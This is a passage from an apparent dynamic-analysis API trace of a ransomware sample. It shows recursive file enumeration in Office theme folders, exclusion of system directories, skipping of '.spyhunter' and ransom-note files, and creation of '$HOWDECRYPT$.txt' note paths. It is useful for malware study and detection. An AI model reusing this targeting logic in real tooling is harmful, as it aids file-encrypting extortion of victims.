Shared\\THEMES14\\BLUECALM\\$HOWDECRYPT$.txt") returned 85 [0090.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\$HOWDECRYPT$.txt") returned 85 [0090.028] GetProcessHeap () returned 0x2c0000 [0090.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354338 [0090.028] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf68) returned 0x3824f8 [0090.028] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.028] lstrcmpiW (lpString1="BLUEPRNT", lpString2="Windows") returned -1 [0090.028] lstrlenW (lpString="Windows") returned 7 [0090.028] lstrcmpiW (lpString1="BLUEPRNT", lpString2="$Recycle.bin") returned 1 [0090.028] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.028] lstrcmpiW (lpString1="BLUEPRNT", lpString2="System Volume Information") returned -1 [0090.028] lstrlenW (lpString="System Volume Information") returned 25 [0090.028] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT") returned 68 [0090.028] lstrcmpW (lpString1="BLUEPRNT", lpString2=".") returned 1 [0090.028] lstrcmpW (lpString1="BLUEPRNT", lpString2="..") returned 1 [0090.029] GetProcessHeap () returned 0x2c0000 [0090.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.029] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*") returned 70 [0090.029] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.232] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.232] lstrlenW (lpString="Windows") returned 7 [0090.232] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.232] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.232] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.232] lstrlenW (lpString="System Volume Information") returned 25 [0090.232] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\.") returned 70 [0090.232] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.232] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.233] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.233] lstrlenW (lpString="Windows") returned 7 [0090.233] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.233] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.233] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.233] lstrlenW (lpString="System Volume Information") returned 25 [0090.233] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\..") returned 71 [0090.233] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.233] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.233] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.233] lstrcmpiW (lpString1="BLUEPRNT.ELM", lpString2="Windows") returned -1 [0090.233] lstrlenW (lpString="Windows") returned 7 [0090.233] lstrcmpiW (lpString1="BLUEPRNT.ELM", lpString2="$Recycle.bin") returned 1 [0090.233] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.233] lstrcmpiW (lpString1="BLUEPRNT.ELM", lpString2="System Volume Information") returned -1 [0090.233] lstrlenW (lpString="System Volume Information") returned 25 [0090.233] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned 81 [0090.233] StrStrIW (lpFirst="BLUEPRNT.ELM", lpSrch=".spyhunter") returned 0x0 [0090.233] lstrcmpW (lpString1="BLUEPRNT.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.233] lstrcmpW (lpString1="BLUEPRNT.ELM", lpString2="_uninstalling_.png") returned 1 [0090.236] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.ELM") returned 81 [0090.236] GetProcessHeap () returned 0x2c0000 [0090.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3440b8 [0090.236] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf58) returned 0x3824f8 [0090.236] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.236] lstrcmpiW (lpString1="BLUEPRNT.INF", lpString2="Windows") returned -1 [0090.236] lstrlenW (lpString="Windows") returned 7 [0090.236] lstrcmpiW (lpString1="BLUEPRNT.INF", lpString2="$Recycle.bin") returned 1 [0090.236] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.236] lstrcmpiW (lpString1="BLUEPRNT.INF", lpString2="System Volume Information") returned -1 [0090.236] lstrlenW (lpString="System Volume Information") returned 25 [0090.236] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF") returned 81 [0090.236] StrStrIW (lpFirst="BLUEPRNT.INF", lpSrch=".spyhunter") returned 0x0 [0090.236] lstrcmpW (lpString1="BLUEPRNT.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.236] lstrcmpW (lpString1="BLUEPRNT.INF", lpString2="_uninstalling_.png") returned 1 [0090.236] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\BLUEPRNT.INF") returned 81 [0090.237] GetProcessHeap () returned 0x2c0000 [0090.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3441a8 [0090.237] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf60) returned 0x3824f8 [0090.237] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.237] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.237] lstrlenW (lpString="Windows") returned 7 [0090.237] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.237] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.237] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.237] lstrlenW (lpString="System Volume Information") returned 25 [0090.237] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 80 [0090.237] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.237] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.237] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.237] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 80 [0090.237] GetProcessHeap () returned 0x2c0000 [0090.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x344298 [0090.237] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf68) returned 0x3824f8 [0090.237] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.237] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.237] lstrlenW (lpString="Windows") returned 7 [0090.237] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.237] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.237] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.237] lstrlenW (lpString="System Volume Information") returned 25 [0090.237] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 81 [0090.238] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.238] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.238] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.238] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 81 [0090.238] GetProcessHeap () returned 0x2c0000 [0090.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344388 [0090.238] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf70) returned 0x3824f8 [0090.238] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.238] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.238] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\$HOWDECRYPT$.txt") returned 85 [0090.238] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\$HOWDECRYPT$.txt") returned 85 [0090.238] GetProcessHeap () returned 0x2c0000 [0090.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354338 [0090.238] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf78) returned 0x3824f8 [0090.238] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.238] lstrcmpiW (lpString1="BOLDSTRI", lpString2="Windows") returned -1 [0090.238] lstrlenW (lpString="Windows") returned 7 [0090.238] lstrcmpiW (lpString1="BOLDSTRI", lpString2="$Recycle.bin") returned 1 [0090.238] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.238] lstrcmpiW (lpString1="BOLDSTRI", lpString2="System Volume Information") returned -1 [0090.238] lstrlenW (lpString="System Volume Information") returned 25 [0090.239] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI") returned 68 [0090.239] lstrcmpW (lpString1="BOLDSTRI", lpString2=".") returned 1 [0090.239] lstrcmpW (lpString1="BOLDSTRI", lpString2="..") returned 1 [0090.239] GetProcessHeap () returned 0x2c0000 [0090.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.239] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*") returned 70 [0090.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.242] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.242] lstrlenW (lpString="Windows") returned 7 [0090.242] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.242] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.242] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.242] lstrlenW (lpString="System Volume Information") returned 25 [0090.242] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\.") returned 70 [0090.242] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.242] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.242] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.242] lstrlenW (lpString="Windows") returned 7 [0090.242] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.242] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.242] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.243] lstrlenW (lpString="System Volume Information") returned 25 [0090.243] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\..") returned 71 [0090.243] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.243] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.243] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.243] lstrcmpiW (lpString1="BOLDSTRI.ELM", lpString2="Windows") returned -1 [0090.243] lstrlenW (lpString="Windows") returned 7 [0090.243] lstrcmpiW (lpString1="BOLDSTRI.ELM", lpString2="$Recycle.bin") returned 1 [0090.243] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.243] lstrcmpiW (lpString1="BOLDSTRI.ELM", lpString2="System Volume Information") returned -1 [0090.243] lstrlenW (lpString="System Volume Information") returned 25 [0090.243] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned 81 [0090.243] StrStrIW (lpFirst="BOLDSTRI.ELM", lpSrch=".spyhunter") returned 0x0 [0090.243] lstrcmpW (lpString1="BOLDSTRI.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.243] lstrcmpW (lpString1="BOLDSTRI.ELM", lpString2="_uninstalling_.png") returned 1 [0090.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.ELM") returned 81 [0090.243] GetProcessHeap () returned 0x2c0000 [0090.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344478 [0090.243] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf78) returned 0x3824f8 [0090.243] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.243] lstrcmpiW (lpString1="BOLDSTRI.INF", lpString2="Windows") returned -1 [0090.243] lstrlenW (lpString="Windows") returned 7 [0090.243] lstrcmpiW (lpString1="BOLDSTRI.INF", lpString2="$Recycle.bin") returned 1 [0090.243] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.243] lstrcmpiW (lpString1="BOLDSTRI.INF", lpString2="System Volume Information") returned -1 [0090.244] lstrlenW (lpString="System Volume Information") returned 25 [0090.244] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 81 [0090.244] StrStrIW (lpFirst="BOLDSTRI.INF", lpSrch=".spyhunter") returned 0x0 [0090.244] lstrcmpW (lpString1="BOLDSTRI.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.244] lstrcmpW (lpString1="BOLDSTRI.INF", lpString2="_uninstalling_.png") returned 1 [0090.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\BOLDSTRI.INF") returned 81 [0090.244] GetProcessHeap () returned 0x2c0000 [0090.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344568 [0090.244] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf80) returned 0x3824f8 [0090.244] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.244] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.244] lstrlenW (lpString="Windows") returned 7 [0090.244] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.244] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.244] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.244] lstrlenW (lpString="System Volume Information") returned 25 [0090.244] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 80 [0090.244] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.244] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.244] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 80 [0090.244] GetProcessHeap () returned 0x2c0000 [0090.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x344658 [0090.244] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf88) returned 0x3824f8 [0090.244] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.245] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.245] lstrlenW (lpString="Windows") returned 7 [0090.245] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.245] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.245] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.245] lstrlenW (lpString="System Volume Information") returned 25 [0090.245] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 81 [0090.245] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.245] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.245] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 81 [0090.245] GetProcessHeap () returned 0x2c0000 [0090.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x344748 [0090.245] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf90) returned 0x3824f8 [0090.245] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.245] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.245] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\$HOWDECRYPT$.txt") returned 85 [0090.245] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\$HOWDECRYPT$.txt") returned 85 [0090.245] GetProcessHeap () returned 0x2c0000 [0090.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354908 [0090.245] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf98) returned 0x3824f8 [0090.245] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.246] lstrcmpiW (lpString1="BREEZE", lpString2="Windows") returned -1 [0090.246] lstrlenW (lpString="Windows") returned 7 [0090.246] lstrcmpiW (lpString1="BREEZE", lpString2="$Recycle.bin") returned 1 [0090.246] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.246] lstrcmpiW (lpString1="BREEZE", lpString2="System Volume Information") returned -1 [0090.246] lstrlenW (lpString="System Volume Information") returned 25 [0090.246] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE") returned 66 [0090.246] lstrcmpW (lpString1="BREEZE", lpString2=".") returned 1 [0090.246] lstrcmpW (lpString1="BREEZE", lpString2="..") returned 1 [0090.246] GetProcessHeap () returned 0x2c0000 [0090.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.246] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*") returned 68 [0090.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.252] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.252] lstrlenW (lpString="Windows") returned 7 [0090.252] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.252] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.252] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.252] lstrlenW (lpString="System Volume Information") returned 25 [0090.252] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\.") returned 68 [0090.252] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.252] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.253] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.253] lstrlenW (lpString="Windows") returned 7 [0090.253] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.253] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.253] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.253] lstrlenW (lpString="System Volume Information") returned 25 [0090.253] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\..") returned 69 [0090.253] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.253] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.253] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.253] lstrcmpiW (lpString1="BREEZE.ELM", lpString2="Windows") returned -1 [0090.253] lstrlenW (lpString="Windows") returned 7 [0090.253] lstrcmpiW (lpString1="BREEZE.ELM", lpString2="$Recycle.bin") returned 1 [0090.253] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.253] lstrcmpiW (lpString1="BREEZE.ELM", lpString2="System Volume Information") returned -1 [0090.253] lstrlenW (lpString="System Volume Information") returned 25 [0090.253] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 77 [0090.253] StrStrIW (lpFirst="BREEZE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.253] lstrcmpW (lpString1="BREEZE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.253] lstrcmpW (lpString1="BREEZE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 77 [0090.253] GetProcessHeap () returned 0x2c0000 [0090.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374218 [0090.253] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf90) returned 0x3824f8 [0090.253] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.253] lstrcmpiW (lpString1="BREEZE.INF", lpString2="Windows") returned -1 [0090.254] lstrlenW (lpString="Windows") returned 7 [0090.254] lstrcmpiW (lpString1="BREEZE.INF", lpString2="$Recycle.bin") returned 1 [0090.254] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.254] lstrcmpiW (lpString1="BREEZE.INF", lpString2="System Volume Information") returned -1 [0090.254] lstrlenW (lpString="System Volume Information") returned 25 [0090.254] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF") returned 77 [0090.254] StrStrIW (lpFirst="BREEZE.INF", lpSrch=".spyhunter") returned 0x0 [0090.254] lstrcmpW (lpString1="BREEZE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.254] lstrcmpW (lpString1="BREEZE.INF", lpString2="_uninstalling_.png") returned 1 [0090.254] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.INF") returned 77 [0090.254] GetProcessHeap () returned 0x2c0000 [0090.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x374958 [0090.254] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf98) returned 0x3824f8 [0090.254] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.254] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.254] lstrlenW (lpString="Windows") returned 7 [0090.254] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.254] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.254] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.254] lstrlenW (lpString="System Volume Information") returned 25 [0090.254] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 78 [0090.254] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.254] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.254] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.254] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 78 [0090.255] GetProcessHeap () returned 0x2c0000 [0090.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x374a40 [0090.255] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xfa0) returned 0x3824f8 [0090.255] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.255] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.255] lstrlenW (lpString="Windows") returned 7 [0090.255] lstrcmpiW 